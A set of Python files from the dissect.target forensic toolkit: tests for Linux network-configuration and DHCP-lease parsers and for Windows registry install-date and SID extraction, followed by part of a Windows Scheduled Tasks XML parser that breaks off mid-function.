from __future__ import annotations

import textwrap
from datetime import datetime
from io import BytesIO
from ipaddress import ip_address, ip_interface
from typing import TYPE_CHECKING
from unittest.mock import MagicMock, patch

import pytest

from dissect.target.plugins.os.default.network import UnixInterfaceRecord
from dissect.target.plugins.os.unix.linux.network import (
    DhclientLeaseParser,
    LinuxNetworkConfigParser,
    LinuxNetworkPlugin,
    NetworkManagerConfigParser,
    NetworkManagerLeaseParser,
    ProcConfigParser,
    SyslogConfigParser,
    SystemdNetworkConfigParser,
)
from tests._utils import absolute_path

if TYPE_CHECKING:
    from dissect.target.filesystem import VirtualFilesystem
    from dissect.target.target import Target


def test_networkmanager_parser(target_linux: Target, fs_linux: VirtualFilesystem) -> None:
    fixture_dir = absolute_path("_data/plugins/os/unix/linux/NetworkManager")
    fs_linux.map_dir("/etc/NetworkManager/system-connections", fixture_dir)

    network_manager_config_parser = NetworkManagerConfigParser(target_linux)
    interfaces = list(network_manager_config_parser.interfaces())

    assert len(interfaces) == 2
    wired, wireless = interfaces

    assert wired.name == "enp0s3"
    assert wired.type == "ethernet"
    assert wired.enabled is None
    assert set(wired.cidr) == {ip_interface("192.168.2.138/24"), ip_interface("10.1.1.10/16")}
    assert set(wired.gateway) == {
        ip_address("192.168.2.2"),
        ip_address("2620:52:0:2219:222:68ff:fe11:5403"),
        ip_address("192.168.2.3"),
    }
    assert wired.dns == [ip_address("88.88.88.88")]
    assert wired.mac == ["08:00:27:5B:4A:EB"]
    assert wired.source == "/etc/NetworkManager/system-connections/wired-static.nmconnection"
    assert not wired.dhcp_ipv4
    assert not wired.dhcp_ipv6
    assert wired.last_connected == datetime.fromisoformat("2024-10-29 07:59:54+00:00")
    assert set(wired.vlan) == {10, 11}
    assert wired.configurator == "NetworkManager"

    assert wireless.name == "wlp2s0"
    assert wireless.type == "wifi"
    assert wireless.enabled is None
    assert wireless.cidr == []
    assert wireless.gateway == []
    assert wireless.dns == []
    assert wireless.mac == []
    assert wireless.source == "/etc/NetworkManager/system-connections/wireless.nmconnection"
    assert wireless.dhcp_ipv4
    assert wireless.dhcp_ipv6
    assert wireless.last_connected is None
    assert wireless.vlan == []
    assert wireless.configurator == "NetworkManager"


def test_systemd_network_parser(target_linux: Target, fs_linux: VirtualFilesystem) -> None:
    fixture_dir = absolute_path("_data/plugins/os/unix/linux/systemd.network")

    fs_linux.map_file("/etc/systemd/network/20-wired-static.network", fixture_dir.joinpath("20-wired-static.network"))
    fs_linux.map_file(
        "/etc/systemd/network/30-wired-static-complex.network",
        fixture_dir.joinpath("30-wired-static-complex.network"),
    )
    fs_linux.map_file("/usr/lib/systemd/network/40-wireless.network", fixture_dir.joinpath("40-wireless.network"))
    fs_linux.map_file("/run/systemd/network/40-wireless-ipv4.network", fixture_dir.joinpath("40-wireless-ipv4.network"))
    fs_linux.map_file(
        "/usr/local/lib/systemd/network/40-wireless-ipv6.network",
        fixture_dir.joinpath("40-wireless-ipv6.network"),
    )
    fs_linux.map_file("/etc/systemd/network/20-vlan.netdev", fixture_dir.joinpath("20-vlan.netdev"))
    fs_linux.map_file("/etc/systemd/network/20-vlan2.netdev", fixture_dir.joinpath("20-vlan2.netdev"))

    systemd_network_config_parser = SystemdNetworkConfigParser(target_linux)
    interfaces = list(systemd_network_config_parser.interfaces())

    assert len(interfaces) == 5
    wired_static, wired_static_complex, wireless, wireless_ipv4, wireless_ipv6 = interfaces

    assert wired_static.name == "enp1s0"
    assert wired_static.type is None
    assert wired_static.enabled is None
    assert wired_static.cidr == ["10.1.10.9/24"]
    assert wired_static.gateway == [ip_address("10.1.10.1")]
    assert wired_static.dns == [ip_address("10.1.10.1")]
    assert wired_static.mac == ["aa::bb::cc::dd::ee::ff"]
    assert wired_static.source == "/etc/systemd/network/20-wired-static.network"
    assert not wired_static.dhcp_ipv4
    assert not wired_static.dhcp_ipv6
    assert wired_static.last_connected is None
    assert set(wired_static.vlan) == {100, 101}
    assert wired_static.configurator == "systemd-networkd"

    assert wired_static_complex.name == "enp1s0"
    assert wired_static_complex.type == "ether"
    assert wired_static_complex.enabled is None
    assert set(wired_static_complex.cidr) == {ip_interface("10.1.10.9/16"), ip_interface("10.1.9.10/24")}
    assert set(wired_static_complex.gateway) == {
        ip_address("10.1.6.3"),
        ip_address("10.1.10.2"),
        ip_address("10.1.9.3"),
    }
    assert set(wired_static_complex.dns) == {
        ip_address("10.1.10.1"),
        ip_address("10.1.10.2"),
        ip_address("1111:2222::3333"),
    }
    assert set(wired_static_complex.mac) == {
        "aa::bb::cc::dd::ee::ff",
        "ff::ee::dd::cc::bb::aa",
        "cc::ff::bb::aa::dd",
        "bb::aa::dd::cc::ff",
    }
    assert wired_static_complex.source == "/etc/systemd/network/30-wired-static-complex.network"
    assert not wired_static_complex.dhcp_ipv4
    assert not wired_static_complex.dhcp_ipv6
    assert wired_static_complex.last_connected is None
    assert wired_static_complex.vlan == []
    assert wired_static_complex.configurator == "systemd-networkd"

    assert wireless.name == "wlp2s0"
    assert wireless.type == "wifi"
    assert wireless.enabled is None
    assert wireless.cidr == []
    assert wireless.gateway == []
    assert wireless.dns == []
    assert wireless.mac == []
    assert wireless.source == "/usr/lib/systemd/network/40-wireless.network"
    assert wireless.dhcp_ipv4
    assert wireless.dhcp_ipv6
    assert wireless.last_connected is None
    assert wired_static_complex.vlan == []
    assert wired_static_complex.configurator == "systemd-networkd"

    assert wireless_ipv4.source == "/run/systemd/network/40-wireless-ipv4.network"
    assert wireless_ipv4.dhcp_ipv4
    assert not wireless_ipv4.dhcp_ipv6

    assert wireless_ipv6.source == "/usr/local/lib/systemd/network/40-wireless-ipv6.network"
    assert not wireless_ipv6.dhcp_ipv4
    assert wireless_ipv6.dhcp_ipv6


def test_systemd_network_drop(target_linux: Target, fs_linux: VirtualFilesystem) -> None:
    fixture_dir = absolute_path("_data/plugins/os/unix/linux/systemd.network")

    fs_linux.map_file(
        "/etc/systemd/network/30-wired-static-complex.network",
        fixture_dir.joinpath("30-wired-static-complex.network"),
    )
    fs_linux.map_file(
        "/etc/systemd/network/30-wired-static-complex.network.d/10-override.conf",
        fixture_dir.joinpath("30-wired-static-complex.network.d/10-override.conf"),
    )
    fs_linux.map_file(
        "/etc/systemd/network/30-wired-static-complex.network.d/20-override.conf",
        fixture_dir.joinpath("30-wired-static-complex.network.d/20-override.conf"),
    )

    systemd_network_config_parser = SystemdNetworkConfigParser(target_linux)
    interfaces = list(systemd_network_config_parser.interfaces())

    assert len(interfaces) == 1
    [wired_static_complex] = interfaces

    assert wired_static_complex.name == "wlp2s0"
    assert wired_static_complex.type == "wifi"
    assert wired_static_complex.enabled is None
    assert set(wired_static_complex.cidr) == {ip_interface("10.1.10.11/16")}
    assert set(wired_static_complex.gateway) == {
        ip_address("10.1.6.3"),
        ip_address("10.1.10.2"),
        ip_address("10.1.9.3"),
        ip_address("10.1.10.4"),
    }
    assert set(wired_static_complex.dns) == {
        ip_address("10.1.10.1"),
        ip_address("10.1.10.2"),
        ip_address("1111:2222::3333"),
    }
    assert set(wired_static_complex.mac) == {
        "aa::bb::cc::dd::ee::ff",
        "ff::ee::dd::cc::bb::aa",
        "cc::ff::bb::aa::dd",
        "bb::aa::dd::cc::ff",
    }
    assert wired_static_complex.source == "/etc/systemd/network/30-wired-static-complex.network"
    assert wired_static_complex.dhcp_ipv4
    assert not wired_static_complex.dhcp_ipv6
    assert wired_static_complex.last_connected is None
    assert wired_static_complex.vlan == []
    assert wired_static_complex.configurator == "systemd-networkd"


def test_linux_network_plugin_interfaces(target_linux: Target) -> None:
    """Assert that the LinuxNetworkPlugin aggregates from all Config Parsers."""

    MockLinuxConfigParser1: LinuxNetworkConfigParser = MagicMock()
    MockLinuxConfigParser1.return_value.interfaces.return_value = []

    MockLinuxConfigParser2: LinuxNetworkConfigParser = MagicMock()
    MockLinuxConfigParser2.return_value.interfaces.return_value = [UnixInterfaceRecord()]

    with patch(
        "dissect.target.plugins.os.unix.linux.network.MANAGERS", [MockLinuxConfigParser1, MockLinuxConfigParser2]
    ):
        linux_network_plugin = LinuxNetworkPlugin(target_linux)
        interfaces = list(linux_network_plugin.interfaces())

        assert len(interfaces) == 1
        MockLinuxConfigParser1.return_value.interfaces.assert_called_once()
        MockLinuxConfigParser2.return_value.interfaces.assert_called_once()


def test_linux_network_dhclient_leases_file(target_linux: Target, fs_linux: VirtualFilesystem) -> None:
    lease_dhcp_dhclient = r"""
    default-duid "\000\001\000\001\037\305\371\341\001\002\003\004\005\006"
    lease {
        interface "eth0";  # some comment
        fixed-address 1.2.3.4;
        option dhcp-lease-time 13337;
        option routers 0.0.0.0;
        option host-name "hostname";
        option subnet-mask 255.255.255.0;
        renew 1 2023/12/31 13:37:00;
        rebind 2 2023/01/01 01:00:00;
        expire 3 2024/01/01 13:37:00;
    }
    lease {
        interface "eth0";
        fixed-address 2001:db8::2:1;
        option dhcp-lease-time 13338;
        option routers 1.1.1.1;
        option host-name "hostname";
        renew 4 2024/12/31 14:37:00;
        rebind 5 2024/01/01 02:00:00;
        expire 6 2025/01/01 15:37:00;
        # some more comments
    }
    """

    fs_linux.map_file_fh("/var/lib/dhcp/dhclient.leases", BytesIO(textwrap.dedent(lease_dhcp_dhclient).encode()))
    fs_linux.map_file_fh(
        "/var/lib/dhclient/dhclient.eth0.leases", BytesIO(textwrap.dedent(lease_dhcp_dhclient).encode())
    )

    dhclient = DhclientLeaseParser(target_linux)

    leases = list(dhclient.interfaces())

    assert len(leases) == 4
    assert leases[0].name == "eth0"
    assert leases[0].type == "dhcp"
    assert leases[0].cidr == [ip_interface("1.2.3.4/24")]
    assert leases[0].gateway == [ip_address("0.0.0.0")]
    assert leases[0].dhcp_ipv4
    assert not leases[0].dhcp_ipv6
    assert leases[0].configurator == "dhclient"

    assert leases[3].name == "eth0"
    assert leases[3].type == "dhcp"
    assert leases[3].cidr == [ip_interface("2001:db8::2:1/128")]
    assert leases[3].gateway == [ip_address("1.1.1.1")]
    assert not leases[3].dhcp_ipv4
    assert leases[3].dhcp_ipv6
    assert leases[0].configurator == "dhclient"


def test_linux_network_networkmanager_leases_file(target_linux: Target, fs_linux: VirtualFilesystem) -> None:
    lease_networkmanager = """
    # This is private data. Do not parse.
    ADDRESS=1.3.3.7
    """

    fs_linux.map_file_fh(
        "/var/lib/NetworkManager/internal-d6b936ad-d73f-4898-a826-edbb61d6155a-eth0.lease",
        BytesIO(textwrap.dedent(lease_networkmanager).encode()),
    )

    networkmanager = NetworkManagerLeaseParser(target_linux)
    leases = list(networkmanager.interfaces())

    assert len(leases) == 1
    assert leases[0].name == "eth0"
    assert leases[0].type == "dhcp"
    assert leases[0].configurator == "NetworkManager"
    assert leases[0].cidr == [ip_interface("1.3.3.7/32")]


def test_proc_config_parser(target_linux: Target, fs_linux: VirtualFilesystem) -> None:
    fixture_dir = absolute_path("_data/plugins/os/unix/linux/proc")
    fs_linux.map_file("/proc/net/route", fixture_dir.joinpath("route"))
    fs_linux.map_file("/proc/net/tcp", fixture_dir.joinpath("tcp"))
    fs_linux.map_file("/proc/net/if_inet6", fixture_dir.joinpath("if_inet6"))
    fs_linux.map_file("/proc/net/fib_trie", fixture_dir.joinpath("fib_trie"))

    parser = ProcConfigParser(target_linux)
    interfaces = list(parser.interfaces())

    # Destructure interfaces by name for easy assertions
    assert len(interfaces) == 4
    (
        wlp,
        docker,
        vir,
        lo,
    ) = interfaces

    assert set(wlp.cidr) == {ip_interface("fe80::f66c:ff08:22f4:9090/64"), ip_interface("192.168.1.109/24")}
    assert wlp.gateway == [ip_address("192.168.1.1")]

    assert lo.cidr == [ip_interface("::1/128")]
    assert docker.cidr == [ip_interface("172.17.0.1/16")]
    assert vir.cidr == [ip_interface("192.168.122.1/24")]


@pytest.mark.parametrize(
    ("expected_record", "messages"),
    [
        (
            {
                "name": "eth0",
                "cidr": [ip_interface("10.13.37.1/32")],
                "gateway": [],
                "source": "syslog",
            },
            "Jan  1 13:37:01 hostname NetworkManager[1]: <info>  [1600000000.0000] dhcp4 (eth0): option ip_address           => '10.13.37.1'",  # noqa: E501
        ),
        (
            {
                "name": "eth0",
                "cidr": [ip_interface("10.13.37.1/32")],
                "gateway": [],
                "source": "syslog",
            },
            "Jan  1 13:37:01 hostname NetworkManager[2]: <info>  [1600000000.0000] dhcp4 (eth0): state changed new lease, address=10.13.37.1",  # noqa: E501
        ),
        (
            {
                "name": "eth0",
                "cidr": [ip_interface("10.13.37.1/32")],
                "gateway": [],
                "source": "syslog",
            },
            "Jan  1 13:37:01 hostname NetworkManager[2]: <info>  [1600000000.0000] dhcp4 (eth0): state changed new lease, address=10.13.37.1, acd pending",  # noqa: E501
        ),
        (
            {
                "name": "eth0",
                "cidr": [ip_interface("10.13.37.2/24")],
                "gateway": [ip_address("10.13.37.0")],
                "source": "syslog",
            },
            "Feb  2 13:37:02 test systemd-networkd[3]: eth0: DHCPv4 address 10.13.37.2/24 via 10.13.37.0",
        ),
        (
            {
                "name": "eth0",
                "cidr": [ip_interface("10.13.37.3/32")],
                "gateway": [],
                "source": "syslog",
            },
            "Mar  3 13:37:03 localhost NetworkManager[4]: <info>  [1600000000.0003] dhcp4 (eth0):   address 10.13.37.3",
        ),
        (
            {
                "name": None,
                "cidr": [ip_interface("10.13.37.4/32")],
                "gateway": [],
                "source": "syslog",
            },
            "Apr  4 13:37:04 localhost dhclient[5]: bound to 10.13.37.4 -- renewal in 1337 seconds.",
        ),
        (
            {
                "name": "eth0",
                "cidr": [ip_interface("2001:db8::/64")],
                "gateway": [ip_address("2001:db8:ffff:ffff:ffff:ffff:ffff:ffff")],
                "source": "syslog",
            },
            (
                "Jun  6 13:37:06 test systemd-networkd[6]: eth0: DHCPv6 address 2001:db8::/64 via 2001:db8:ffff:ffff:ffff:ffff:ffff:ffff\n"  # noqa: E501
                "May  5 13:37:05 test systemd-networkd[6]: eth0: DHCPv6 lease lost\n"
            ),
        ),
    ],
)
def test_ips_dhcp(target_unix_users: Target, fs_unix: VirtualFilesystem, expected_record: dict, messages: str) -> None:
    """Test DHCP lease messages from /var/log/syslog."""

    fs_unix.map_file_fh(
        "/var/log/syslog",
        BytesIO(textwrap.dedent(messages).encode()),
    )

    syslog_config_parser = SyslogConfigParser(target_unix_users, 5)
    results = list(syslog_config_parser.interfaces())

    assert len(results) == 1
    result = results[0]
    assert result.name == expected_record["name"]
    assert result.cidr == expected_record["cidr"]
    assert result.gateway == expected_record["gateway"]
    assert result.source == expected_record["source"]


def test_syslog_config_parser_multiple_lines(target_unix_users: Target, fs_unix: VirtualFilesystem) -> None:
    """Test that SyslogConfigParser can parse multiple DHCP lease messages from syslog."""
    messages = """
    Jan  1 13:37:01 hostname NetworkManager[1]: <info>  [1600000000.0000] dhcp4 (eth0): option ip_address           => '10.13.37.1'
    Feb  2 13:37:02 test systemd-networkd[2]: eth0: DHCPv4 address 10.13.37.2/24 via 10.13.37.0
    Mar  3 13:37:03 localhost NetworkManager[3]: <info>  [1600000000.0003] dhcp4 (eth0):   address 10.13.37.3
    """  # noqa: E501

    fs_unix.map_file_fh(
        "/var/log/syslog",
        BytesIO(textwrap.dedent(messages).encode()),
    )

    syslog_config_parser = SyslogConfigParser(target_unix_users, 5)
    results = list(syslog_config_parser.interfaces())

    # Should parse 3 records, one for each line
    assert len(results) == 3
    assert results[2].cidr == [ip_interface("10.13.37.1/32")]
    assert results[1].cidr == [ip_interface("10.13.37.2/24")]
    assert results[0].cidr == [ip_interface("10.13.37.3/32")]



from __future__ import annotations

from typing import TYPE_CHECKING

from dissect.util.ts import from_unix

from dissect.target.helpers.regutil import VirtualKey, VirtualValue
from dissect.target.plugins.os.windows.generic import GenericPlugin

if TYPE_CHECKING:
    from dissect.target.plugins.os.windows.registry import VirtualHive
    from dissect.target.target import Target


def test_windows_generic_install_date(target_win_users: Target, hive_hklm: VirtualHive) -> None:
    currentversion_key_name = "Software\\Microsoft\\Windows NT\\CurrentVersion"
    currentversion_key = VirtualKey(hive_hklm, currentversion_key_name)
    currentversion_key.add_value("InstallDate", VirtualValue(hive_hklm, "InstallDate", 0))
    hive_hklm.map_key(currentversion_key_name, currentversion_key)
    target_win_users.add_plugin(GenericPlugin)

    assert target_win_users.install_date == from_unix(0)


def test_windows_generic_sid(target_win: Target, hive_hklm: VirtualHive) -> None:
    value_machine = b"\x00\x00\x00\x00H\x01\x00\x00\x03\x00\x01\x00H\x01\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x14\x80(\x01\x00\x008\x01\x00\x00\x14\x00\x00\x00D\x00\x00\x00\x02\x000\x00\x02\x00\x00\x00\x02\xc0\x14\x00z\x04\x05\x01\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x02\xc0\x14\x00\xff\x07\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x07\x00\x00\x00\x02\x00\xe4\x00\x08\x00\x00\x00\x00\x00\x14\x00\x85\x03\x02\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x18\x00\x85\x03\x02\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00!\x02\x00\x00\x00\x00\x18\x00\xdf\x07\x0f\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00 \x02\x00\x00\x00\x00\x18\x00\x85\x03\x02\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00#\x02\x00\x00\x00\x00\x18\x00\xd5\x03\x02\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00$\x02\x00\x00\x00\x008\x00\x85\x03\x02\x00\x01\n\x00\x00\x00\x00\x00\x0f\x03\x00\x00\x00\x00\x04\x00\x00\xde\xa2(g!>\xd2\xaf\x19\xad]y\xb0\xc1\x07)'V\xfc \xd8\xadf\xf6\x10\xf2h\xfa\xdf*\xf8\x0f\x01\x00\x18\x00P\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00#\x02\x00\x00\x01\x00\x18\x00P\x00\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00#\x02\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00 \x02\x00\x00\x01\x02\x00\x00\x00\x00\x00\x05 \x00\x00\x00 \x02\x00\x00\x01\x04\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc3,HH\xddV\r\xd1\xab\xbe\x8a\xe0"  # noqa: E501

    value_domain = (
        b"\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\xc8\x13\x95z\x9c\xf0\xcd\x83I\xd9\x9e\xb9E\x06\x00\x00"
    )
    machine_sid_key_name = "SAM\\SAM\\Domains\\Account"
    domain_sid_key_name = "SECURITY\\Policy\\PolMachineAccountS"

    machine_sid_key = VirtualKey(hive_hklm, machine_sid_key_name)
    domain_sid_key = VirtualKey(hive_hklm, domain_sid_key_name)

    machine_sid_key.add_value("V", VirtualValue(hive_hklm, "V", value_machine))
    domain_sid_key.add_value("(Default)", VirtualValue(hive_hklm, "(Default)", value_domain))

    hive_hklm.map_key(machine_sid_key_name, machine_sid_key)
    hive_hklm.map_key(domain_sid_key_name, domain_sid_key)
    target_win.add_plugin(GenericPlugin)

    records = list(target_win.sid())

    assert len(records) == 2

    assert records[0].sid == "S-1-5-21-1212689603-3507312349-3767189163"
    assert records[0].sidtype == "Machine"

    assert records[1].sid == "S-1-5-21-2056590280-2211311772-3114195273-1605"
    assert records[1].sidtype == "Domain"



from __future__ import annotations

from typing import TYPE_CHECKING

from defusedxml import ElementTree
from flow.record import GroupedRecord

from dissect.target.exceptions import InvalidTaskError
from dissect.target.plugins.os.windows.tasks.records import (
    BaseTriggerRecord,
    BootTriggerRecord,
    CalendarTriggerRecord,
    ComHandlerRecord,
    DailyTriggerRecord,
    EventTriggerRecord,
    ExecRecord,
    IdleTriggerRecord,
    LogonTriggerRecord,
    MonthlyDateTriggerRecord,
    MonthlyDowTriggerRecord,
    RegistrationTrigger,
    SendEmailRecord,
    SessionStateChangeTriggerRecord,
    ShowMessageRecord,
    TimeTriggerRecord,
    WeeklyTriggerRecord,
    WnfTriggerRecord,
)

if TYPE_CHECKING:
    from collections.abc import Iterator
    from xml.etree.ElementTree import Element

    from dissect.target.helpers.fsutil import TargetPath


class ScheduledTasks:
    def __init__(self, xml_file: TargetPath):
        try:
            self.xml_data = self.strip_namespace(ElementTree.fromstring(xml_file.open().read(), forbid_dtd=True))
        except Exception as e:
            raise InvalidTaskError(e)

        self.task_path = xml_file
        self.tasks = self.get_tasks()

    def strip_namespace(self, data: Element) -> Element:
        """Strip namespace from XML data.

        If the data has a namespace, it will be removed from all the XML tags.

        Args:
            data: The XML data as an Element object.

        Returns:
            The XML data with the stripped namespace.
        """
        if data.tag.startswith("{"):
            ns_length = data.tag.find("}")
            ns = data.tag[0 : ns_length + 1]
            for element in data.iter():
                element.tag = element.tag.removeprefix(ns)
        return data

    def get_tasks(self) -> list[XmlTask]:
        tasks = []
        if self.xml_data.tag == "Task":
            tasks.append(XmlTask(self.xml_data, self.task_path))
        else:
            tasks.extend(XmlTask(task_element, self.task_path) for task_element in self.xml_data.findall(".//{*}Task"))

        return tasks


def str_to_bool(string_to_convert: str) -> bool | None:
    """Convert a string to a boolean value.

    The conversion is case-insensitive and only accepts 'true' or 'false'
    (with optional surrounding whitespace). Raises a ValueError for any
    other input.

    Args:
        string_to_convert: The input string to convert. Should be 'true' or 'false', case-insensitively.

    Returns:
        None for an empty string, True if the input string is 'true' (case-insensitive), False if 'false'.
    """
    if not string_to_convert:
        return None

    string_to_convert_lower = string_to_convert.strip().lower()
    if string_to_convert_lower == "true":
        return True
    if string_to_convert_lower == "false":
        return False

    raise ValueError(f"Invalid boolean string: '{string_to_convert}' (expected 'true' or 'false')")


class XmlTask:
    """Parses and extracts information from an XML-based Task Scheduler file.

    This class is used to extract metadata, triggers, and actions from a task
    defined in an XML format (used in newer versions of Windows Task Scheduler).

    Args:
        task_element: The root XML element representing the task.
        task_path: The path of the task in the target system.
    """

    def __init__(self, task_element: Element, task_path: TargetPath):
        self.task_path = task_path
        self.task_element = task_element

        # Properties
        self.task_name = self.get_element("Properties", attribute="name")
        self.app_name = self.get_element("Properties", attribute="appName")
        self.args = self.get_element("Properties", attribute="args")
        self.start_in = self.get_element("Properties", attribute="startIn")
        self.comment = self.get_element("Properties", attribute="comment")
        self.run_as = self.get_element("Properties", attribute="runAs")
        self.cpassword = self.get_element("Properties", attribute="cpassword")
        self.action = self.get_element("Properties", attribute="action")

        self.uri = self.get_element("RegistrationInfo/URI")
        self.security_descriptor = self.get_element("RegistrationInfo/SecurityDescriptor")
        self.source = self.get_element("RegistrationInfo/Source")
        self.date = self.get_element("RegistrationInfo/Date")
        self.author = self.get_element("RegistrationInfo/Author")
        self.version = self.get_element("RegistrationInfo/Version")
        self.description = self.get_element("RegistrationInfo/Description")
        self.documentation = self.get_element("RegistrationInfo/Documentation")

        # Principals
        self.principal_id = self.get_element("Principals/Principal", attribute="id")
        self.user_id = self.get_element("Principals/Principal/UserId")
        self.logon_type = self.get_element("Principals/Principal/LogonType")
        self.group_id = self.get_element("Principals/Principal/GroupId")
        self.display_name = self.get_element("Principals/Principal/DisplayName") or task_path.name
        self.run_level = self.get_element("Principals/Principal/RunLevel")
        self.process_token_sid_type = self.get_element("Principals/Principal/ProcessTokenSidType")
        self.required_privileges = self.get_element("Principals/Principal/RequiredPrivileges")

        # Settings
        self.allow_start_on_demand = str_to_bool(self.get_element("Settings/AllowStartOnDemand"))
        self.restart_on_failure_interval = self.get_element("Settings/RestartOnFailure/Interval")
        self.restart_on_failure_count = self.get_element("Settings/RestartOnFailure/Count")
        self.mutiple_instances_policy = self.get_element("Settings/MultipleInstancesPolicy")
        self.disallow_start_on_batteries = str_to_bool(self.get_element("Settings/DisallowStartIfOnBatteries"))
        self.stop_going_on_batteries = str_to_bool(self.get_element("Settings/StopIfGoingOnBatteries"))
        self.allow_hard_terminate = self.get_element("Settings/AllowHardTerminate")
        self.start_when_available = str_to_bool(self.get_element("Settings/StartWhenAvailable"))
        self.network_profile_name = self.get_element("Settings/NetworkProfileName")
        self.run_only_network_available = str_to_bool(self.get_element("Settings/RunOnlyIfNetworkAvailable"))
        self.wake_to_run = str_to_bool(self.get_element("Settings/WakeToRun"))

        self.hidden = str_to_bool(self.get_element("Settings/Hidden"))
        self.delete_expired_task_after = self.get_element("Settings/DeleteExpiredTaskAfter")
        self.idle_duration = self.get_element("Settings/IdleSettings/Duration")
        self.idle_wait_timeout = self.get_element("Settings/IdleSettings/WaitTimeout")
        self.idle_stop_on_idle_end = str_to_bool(self.get_element("Settings/IdleSettings/StopOnIdleEnd"))
        self.idle_restart_on_idle = str_to_bool(self.get_element("Settings/IdleSettings/RestartOnIdle"))
        self.network_settings_name = self.get_element("Settings/NetworkSettings/Name")
        self.network_settings_id = self.get_element("Settings/NetworkSettings/Id")
        self.execution_time_limit = self.get_element("Settings/ExecutionTimeLimit")
        self.priority = self.get_element("Settings/Priority")
        self.run_only_idle = str_to_bool(self.get_element("Settings/RunOnlyIfIdle"))
        self.unified_scheduling_engine = str_to_bool(self.get_element("Settings/UseUnifiedSchedulingEngine"))
        self.disallow_start_on_remote_app_session = str_to_bool(
            self.get_element("Settings/DisallowStartOnRemoteAppSession")
        )

        # Enabled
        self.enabled = str_to_bool(self.get_element("Settings/Enabled"))
        if self.enabled is None:
            self.enabled = str_to_bool(self.get_element("Properties", attribute="enabled"))

        if self.enabled is None:
            self.enabled = True

        # Data
        self.data = self.get_raw("Data")

        self.raw_data = self.get_raw()

    def strip_namespace(self, data: Element) -> Element:
        """Strip namespace from XML data.

        If the data has a namespace, it will be removed from all the XML tags.

        Args:
            data: The XML data as an Element object.

        Returns:
            The XML data with the stripped namespace.
        """
        if data.tag.startswith("{"):
            ns_length = data.tag.find("}")
            ns = data.tag[0 : ns_length + 1]
            for element in data.iter():
                element.tag = element.tag.removeprefix(ns)
        return data

    def get_element(self, xml_path: str, xml_data: Element | None = None, attribute: str | None = None) -> str | None:
        """Get the value of the specified XML element.

        Args:
            xml_path: The string used to locate the element.
            xml_data: The XML data to search in. If not provided, use self.xml_data.
            attribute: The name of a specific attribute from an element that should be returned.

        Returns:
            str: The value of the XML element if found, otherwise None.
        """
        xml_data = xml_data if xml_data is not None else self.task_element
        data = xml_data.find(xml_path)

        if data is None:
            return None
        if attribute:
            return data.get(attribute)

        return data.text

    def get_raw(self, xml_path: str | None = None) -> str:
        """Get the raw XML data of the specified element.

        Args:
            xml_path: The string used to locate the element.

        Returns:
            bytes: The raw XML data as string of the element if found, otherwise None.
        """
        data = self.task_element.find(xml_path) if xml_path else self.task_element
        if data is not None:
            return ElementTree.tostring(data, encoding="utf-8").strip()
        return None

    def get_triggers(self) -> Iterator[GroupedRecord]:
        """Get the triggers from the XML task data.

        Yields:
            GroupedRecord: The grouped record representing a trigger.
        """
        for trigger in self.task_element.findall("Triggers/*"):
            trigger_type = trigger.tag
            trigger_enabled = str_to_bool(self.get_element("Enabled", trigger))
            start_boundary = self.get_element("StartBoundary", trigger)
            end_boundary = self.get_element("EndBoundary", trigger)
            repetition_interval = self.get_element("Repetition/Interval", trigger)
            repetition_duration = self.get_element("Repetition/Duration", trigger)
            repetition_stop_duration_end = str_to_bool(self.get_element("Repetition/StopAtDurationEnd", trigger))
            execution_time_limit = self.get_element("ExecutionTimeLimit", trigger)
            delay = self.get_element("Delay", trigger)
            random_delay = self.get_element("RandomDelay", trigger)
            trigger_data = self.get_element("Data", trigger)

            base = BaseTriggerRecord(
                trigger_enabled=trigger_enabled,
                start_boundary=start_boundary,
                end_boundary=end_boundary,
                repetition_interval=repetition_interval,
                repetition_duration=repetition_duration,
                repetition_stop_duration_end=repetition_stop_duration_end,
                execution_time_limit=execution_time_limit,
                delay=delay,
                random_delay=random_delay,
                trigger_data=trigger_data,
            )

            if trigger_type == "LogonTrigger":
                user_id = self.get_element("UserId", trigger)
                record = LogonTriggerRecord(
                    user_id=user_id,
                )
                yield GroupedRecord(LogonTriggerRecord.name, [base, record])

            elif trigger_type == "BootTrigger":
                yield GroupedRecord(BootTriggerRecord.name, [base])

            elif trigger_type == "IdleTrigger":
                yield GroupedRecord(IdleTriggerRecord.name, [base])

            elif trigger_type == "TimeTrigger":
                yield GroupedRecord(TimeTriggerRecord.name, [base])

            elif trigger_type == "EventTrigger":
                subscription = self.get_element("Subscription", trigger)
                period_of_occurence = self.get_element("PeriodOfOccurrence", trigger)
                number_of_occurences = self.get_element("NumberOfOccurences", trigger)
                matching_elements = self.get_element("MatchingElement", trigger)
                value_queries = self.get_element("ValueQueries/Value", trigger)

                record = EventTriggerRecord(
                    subscription=subscription,
                    period_of_occurence=period_of_occurence,
                    number_of_occurences=number_of_occurences,
                    matching_elements=matching_elements,
                    value_queries=value_queries,
                )

                yield GroupedRecord(EventTriggerRecord.name, [base, record])

            elif trigger_type == "SessionStateChangeTrigger":
                user_id = self.get_element("UserId", trigger)
                state_change = self.get_element("StateChange", trigger)

                record = SessionStateChangeTriggerRecord(
                    user_id=user_id,
                    state_change=state_change,
                )

                yield GroupedRecord(SessionStateChangeTriggerRecord.name, [base, record])

            elif trigger_type == "CalendarTrigger":
                if days_between_triggers := self.get_element("ScheduleByDay/DaysInterval", trigger):
                    record = DailyTriggerRecord(
                        days_between_triggers=int(days_between_triggers),
                    )

                elif weeks_between_triggers := self.get_element("ScheduleByWeek/WeeksInterval", trigger):
                    days_of_week = [day.tag for day in trigger.find("ScheduleByWeek/DaysOfWeek/").iter("*")]
